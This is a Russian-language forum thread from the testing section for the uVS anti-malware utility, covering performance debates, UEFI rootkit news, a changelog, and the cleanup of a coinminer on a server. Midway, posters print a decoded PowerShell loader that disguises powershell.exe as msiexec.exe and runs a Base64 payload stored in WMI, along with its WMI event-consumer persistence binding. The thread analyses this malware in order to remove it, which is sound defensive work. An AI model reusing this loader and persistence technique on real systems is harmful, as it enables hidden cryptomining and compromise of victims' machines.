uVS - Тестирование

[Dragokas 2]

1 час назад, demkd сказал:

это не поможет, все упирается в убитый диск или сильно фрагментированный диск и на наличие активного антивируса, последний как раз может удвоить, а то и утроить время создания диска, процесс то очень простой: считывание файла, подсчет контрольной суммы, потом проверка эцп тут хоть рилтайм ставь станет разве что хуже, процессор тут не самое узкое место.

По CPU понятно. А если поднять I/O priority: https://stackoverflow.com/a/3057675/10205274

[Dragokas 2]

1 час назад, PR55.RP55 сказал:

По поводу доступа к данным и скорости я уже писал:

https://www.jam-software.com/ultrasearch/

Сбор данных занимает секунды.

У меня чекер ярлыков работает на таком движке. Если нужно, поделюсь исходником, но я так понял не нужен.

[demkd 636]

3 часа назад, Dragokas сказал:

А если поднять I/O priority

поднять то можно, вот только это вряд ли поможет, разве что в системе кто-то очень серьезно напрягает винт причем и на запись и на чтение одновременно, я таки думаю что 50% это проблема с антивирусом, 40% недостаток физической памяти и постоянный своп из-за 100500 открытых вкладок в хроме, которые никто не хочет закрывать и 10% на битые винты, а может и больше, настолько это стало распространено, мне даже пришлось утилиту писать для лечения ntfs разделов, увы но никакие стандартные или нестандартные утилиты даже беды в половине случаев прописать не могут, тот же chkdsk игнорирует любые ошибки кроме собствено bad crc и беды не ставит, в результате начинаются дикие тормоза вплоть до неработоспособности ситсемы, не говоря уже про кластера висящие под полсекунды на чтении... и так вот со всем софтом что пальцем не ткни элементарно не работает.
 

3 часа назад, Dragokas сказал:

У меня чекер ярлыков работает на таком движке. Если нужно, поделюсь исходником, но я так понял не нужен.

У меня свой движок, ярлыки разбираются без применения api на низком уровне, заметно быстрее сделать вряд ли возможно.

[PR55.RP55 83]

А если использовать ресурсы видеокарты ?

Так можно будет игнорировать:

100500 открытых вкладок в хроме;  нехватку оперативной памяти >  за счёт работы с памятью самой видеокарты.

+ временно  ограничить доступ к ресурсам видеокарты.

CUDA +

Порой объём памяти современной видеокарты больше чем " родной " оперативной.

 

 

 

[demkd 636]

2 минуты назад, PR55.RP55 сказал:

+ временно  ограничить доступ к ресурсам видеокарты.

память видеокарты никак не поможет просто потому что нет физической, тем более что uVS кушает меньше 100mb даже в 64-х битных системах, а хлам обычно на 32-х битных где считай почти вдвое меньше требуется памяти.

[PR55.RP55 83]

" ультра бюджетный одноядерный AMD Sempron 145, правда с щедрыми 4gb памяти, но uVS не настолько прожорлив
и даже его uVS не смог постоянно грузить на 100% "

Это когда система чиста. Без майнеров\вирусов\антивирусов?

А если эту нагрузку отдать на GPU  ?

 

[demkd 636]

50 минут назад, PR55.RP55 сказал:

Это когда система чиста. Без майнеров\вирусов\антивирусов?

да, но и семпаронов уже давно таких нет, только двухядерные.
 

50 минут назад, PR55.RP55 сказал:

А если эту нагрузку отдать на GPU  ? 

GPU это графический процессор, он пригоден разве что для подсчета хешей, отдельный шейдерный процессор значительно слабее CPU поэтому использовать GPU можно лишь для специфических вычислительных задач не требующих подгрузки данных с диска, иначе оно тотально проигрывает в производительности даже ультра бюджетным CPU, лучше таки почитать про возможности GPU и не предлагать чушь.

[Dragokas 2]

А если эту нагрузку отдать на GPU  ?

Так-то Дмитрию придётся переписывать половину программы и заодно несколько библиотек Майкрософт

Ну или поставлять свою программу в комплекте с упакованным процессором. =))

 

[santy 153]

demkd,

посмотри, пожалуйста,

исходное сообщение:

Цитата

Словил майнер на Сервере и не могу избавится: Оперативная память = msiexec.exe(16684);модифицированный Win32/CoinMiner.DV

какой-то хитрый запуск майнера через WMI, но в списке объектов все файлы легальные, имхо, через powershell выполняется закодированный возможно Base64 скрипт. (и  возможно, новый класс используется для запуска майнера: CommandLineEventConsumer, FsxxleConsumer)

 

https://forum.esetnod32.ru/forum6/topic14912/

образ автозапуска во вложении.

-----------------

попробовал декодировать из Base64, получается:

if ((get-process -name msiexec -ErrorAction SilentlyContinue).Path -eq (dir env:SystemRoot).Value+'\Panther\msiexec.exe'){exit}else{Stop-Process -name msiexec -Force -ErrorAction SilentlyContinue;Stop-Process -name xmrig -Force -ErrorAction SilentlyContinue;cd $env:windir\Panther;copy $env:windir\system32\WindowsPowerShell\v1.0\powershell.exe msiexec.exe -ea SilentlyContinue;copy $env:windir\SysWOW64\WindowsPowerShell\v1.0\powershell.exe msiexec.exe -ea SilentlyContinue;start-process .\msiexec.exe {$WmiName='root\cimv2:Win32_SysCommand';$Wmi=New-Object Management.ManagementClass($WmiName);$F=([WmiClass]$WmiName).Properties['F'].Value;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($F)))} -WindowStyle hidden};exit

 

TS-SERV_2018-08-23_12-05-46.7z

[demkd 636]

31 минут назад, santy сказал:

посмотри, пожалуйста,

C:\WINDOWS\PANTHER\MSIEXEC.EXE
на самом деле это PowerShell
CmdLine: "C:\Windows\Panther\msiexec.exe" $WmiName='root\cimv2:Win32_SysCommand';$Wmi=New-Object Management.ManagementClass($WmiName);$F=([WmiClass]$WmiName).Properties['F'].Value;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($F)))
да что-то делает в wmi, но есть проблема кто запустил его не ясно, радует лишь то что запушен был только он бывает случаи когда пускается по три четыре процесса с разным назначением, нужен таки логгер pid-ов запускаемых процессов
остальное толлько вечером смогу просмотреть, сейчас надо уезжать.
Можно попробовать определить кто таки его запускал используя
https://www.nirsoft.net/utils/executed_programs_list.html

[santy 153]

3 минуты назад, demkd сказал:

C:\WINDOWS\PANTHER\MSIEXEC.EXE
на самом деле это PowerShell

да, этот msiexec (powershell который) запускается походу из раскодированного скрипта:

........

start-process .\msiexec.exe {$WmiName='root\cimv2:Win32_SysCommand';$Wmi=New-Object Management.ManagementClass($WmiName);$F=([WmiClass]$WmiName).Properties['F'].Value;IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($F)))

......

 

[demkd 636]

А нет оно есть в WMI разделе, ничего нового в целом, разве что текст скрипта в base64.
Есть упущение в обработке CommandLineEventConsumer
игнорируется поле WorkingDirectory, но в данном случае это не важно.

[PR55.RP55 83]

Статья:

https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/

 

[demkd 636]

13 минут назад, PR55.RP55 сказал:

Статья:

это не то, здесь используется powershell и лечить элементарно убить эвент, убить процесс собственно все.

[PR55.RP55 83]

Demkd

Появился первый практический UEFI rootkit

https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/

В качестве решения предлагается замена прошивки.

Однако:

1) Нужно выявить, что заражён именно UEFI - значит  как-то нужно это проверить.

Есть программа: Universal BIOS Backup ToolKit 

Которая может ( ? ) создать резервную копию BIOS

Соответственно получив файл мы можем его проверить на V.T. или передать на анализ в вир.лаб.

Или изучить самостоятельно.

2) Нужна профилактика: uVS может создавать резервную копию реестра; системных файлов\STORE

Можно получить оригинальную копию BIOS  и в  последующим при необходимости сравнить\восстановить.

3) Создавать базу SHA1 проверенных прошивок.

 

[PR55.RP55 83]

+

И кстати почему бы не добавить возможность получать\добавлять в базу проверенных SHA1 файлы:

hosts

 

[demkd 636]

В 30.09.2018 at 4:03 AM, PR55.RP55 сказал:

Появился первый практический UEFI rootkit

в данный момент работа с прошивками не планируется, слишком большой объем работ с практически нулевым выхлопом, использование же внешним программ для считывания информации это сельский стиль, который всегда заканчивается эпикфейлом.

 

В 30.09.2018 at 4:10 AM, PR55.RP55 сказал:

hosts

потому что с hosts uVS работает как с базой, возможно когда-нибудь появится возможность делать отдельные записи проверенным.

[demkd 636]

Небольшое обновление для закрытия проблемы c wmi/задачами на базе известных файлов.

---------------------------------------------------------
 4.0.21
---------------------------------------------------------
 o Добавлена поддержка параметра WorkingDirectory для класса CommandLineEventConsumer.

 o Добавлена возможность удалять события WMI и задачи без удаления всех ссылок на файл/объект.
   Скриптовые команды: delwmi и deltsk

 o Исправлена ошибка чтения кэша задач, в некоторых случаях кэш мог не проверяться.

 o Процесс со средней загрузкой >50% на 1 ядро автоматически получает статус "подозрительный".

 

[PR55.RP55 83]

1) По UEFI  можно провести некие подготовительные работы ?

т.е. выполнить часть из того, о чём я писал.

Чтобы в случае реальных проблем можно было бы в сжатые сроки отреагировать.

2) hosts и возможность делать отдельные записи проверенным...

Я бы всё таки реализовал возможность добавлять SHA1 файла в базу проверенных.

И пусть uVS и дальше работает с файлом, как с базой.

При этом, если файл hosts  есть в базе проверенных при [v] "Скрыть: проверенные " записи\строчки относящиеся к данному файлу будут  скрываться _все разом.

3) WMI и прочее "лишнее"  Возможно стоит добавить возможность отключать работу WMI

Как говориться нет WMI нет проблемы ?

4) o Процесс со средней загрузкой >50% на 1 ядро автоматически получает статус "подозрительный".

Э...

Так там все браузеры будут в списке подозрительных с их 1000500 страницами, расширениями и т.д.

что, если автоматически проверять не все ЭЦП а  только ЭЦП файлов которые uVS внёс в список подозрительных ?

Однако для нормальной работы будет нужен базовый\ограниченный\встроенный wdsl - чтобы всё было культурно, включающий только ЭЦП  легальных браузеров.= > Минимум времени на проверку и сокращение списка подозрительны.

[demkd 636]

13 часов назад, PR55.RP55 сказал:

1) По UEFI  можно провести некие подготовительные работы ?

у меня нет лишнего времени, вероятность раскопать что-то гарантировано позволяющее считывать реальную прошивку, а не чистый образ скармливаемый руткитом, практически равна нулю, а скорее даже именно равна нулю, единственный способ это грузиться без всякого uefi с R/O носителя, вот только это бесполезно на практике, а если есть косвенные признаки модификации прошивки вот тогда и можно грузиться с диска, перешивать bios, презаписывать загрузчики убивая буткиты и трясти систему на предмет хвостов.
 

13 часов назад, PR55.RP55 сказал:

При этом, если файл hosts  есть в базе проверенных при [v] "Скрыть: проверенные " записи\строчки относящиеся к данному файлу будут  скрываться _все разом.

не нужно усложнять это глупо.

13 часов назад, PR55.RP55 сказал:

Как говориться нет WMI нет проблемы ?

Тогда уже лучше сформатировать винт, нет системы нет проблемы.

13 часов назад, PR55.RP55 сказал:

Так там все браузеры будут в списке подозрительных с их 1000500 страницами, расширениями и т.д.

и что много уже попало? xD

[santy 153]

В 28.09.2018 at 10:17 PM, demkd сказал:

А нет оно есть в WMI разделе, ничего нового в целом, разве что текст скрипта в base64.
Есть упущение в обработке CommandLineEventConsumer
игнорируется поле WorkingDirectory, но в данном случае это не важно.

почему-то объект с Consumer_Name=FsxxleConsumer не попал в список объектов автозапуска, как в предыдущем случае это было с fuckyoumm2_consumer, (не успел отправить сообщение 28.09 )

теперь вижу, что результат есть в 4.0.21
 

Цитата

  Скриптовые команды: delwmi и deltsk

demkd,

эти команды будут автоматически добавляться в скрипт из контекстного меню? не нашел как это сделать. обычно просто есть опция  - удалить файл, и команда формируется как del   filename

+

пример первого детекта активности майнера по GPU

C:\MO\CLAYMORE\ETHDCRMINER64.EXE

АКТИВНЫЙ ?ВИРУС? ВИРУС ПОДОЗРИТЕЛЬНЫЙ [СЕТЕВАЯ_АКТИВНОСТЬ] GPU

Win64/CoinMiner.BX (delall) [глубина совпадения 64(64), необх. минимум 8, максимум 64] 2018-10-03

GPU 2: 99,31%

https://virusinfo.info/showthread.php?t=220384

[demkd 636]

3 часа назад, santy сказал:

теперь вижу, что результат есть в 4.0.21

он и в том образе был, просто галку скрывать проверенные надо было скинуть, другое дело что удаление его привело бы к убиению lnk файлов, а это не очень хорошо.

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"FsxxleConsumer\"";
    Filter = "__EventFilter.Name=\"FsxxleFilter\"";
};

3 часа назад, santy сказал:

эти команды будут автоматически добавляться в скрипт из контекстного меню?

да, эти пункты контекстного меню доступны в категориях задач и WMI, но пожалуй да, нужно сделать доступными везде, а то неудобно использовать.

[santy 153]

6 минут назад, demkd сказал:

он и в том образе был, просто галку скрывать проверенные надо было скинуть, другое дело что удаление его привело бы к убиению lnk файлов, а это не очень хорошо.

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"FsxxleConsumer\"";
    Filter = "__EventFilter.Name=\"FsxxleFilter\"";
};

Я имел  ввиду, что объект был в списке в качестве отдельного элемента

полное имя: WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]

Consumer_Name:fuckyoumm2_consumer

а с Consumer_Name: FsxxleConsumer такое не получилось.

только в контексте объекта с полным именем

C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE

 

 

[santy 153]

т.е. так оно понятнее:

delwmi WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]

чем

delwmi %Sys32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE

[demkd 636]

50 минут назад, santy сказал:

Я имел  ввиду, что объект был в списке в качестве отдельного элемента

если есть возможность идентифицировать файл то он проявляется именно как файл, а если это обезличенный скрипт вот тогда у него будет специфическое имя, так удобней удалять если скажем это .vbs который может засветиться не только в wmi, а в случае известных файлов теперь есть delwmi который удаляет лишь то что нужно, причем если будет несколько wmi событий на базе того же powershell все они будут удалены.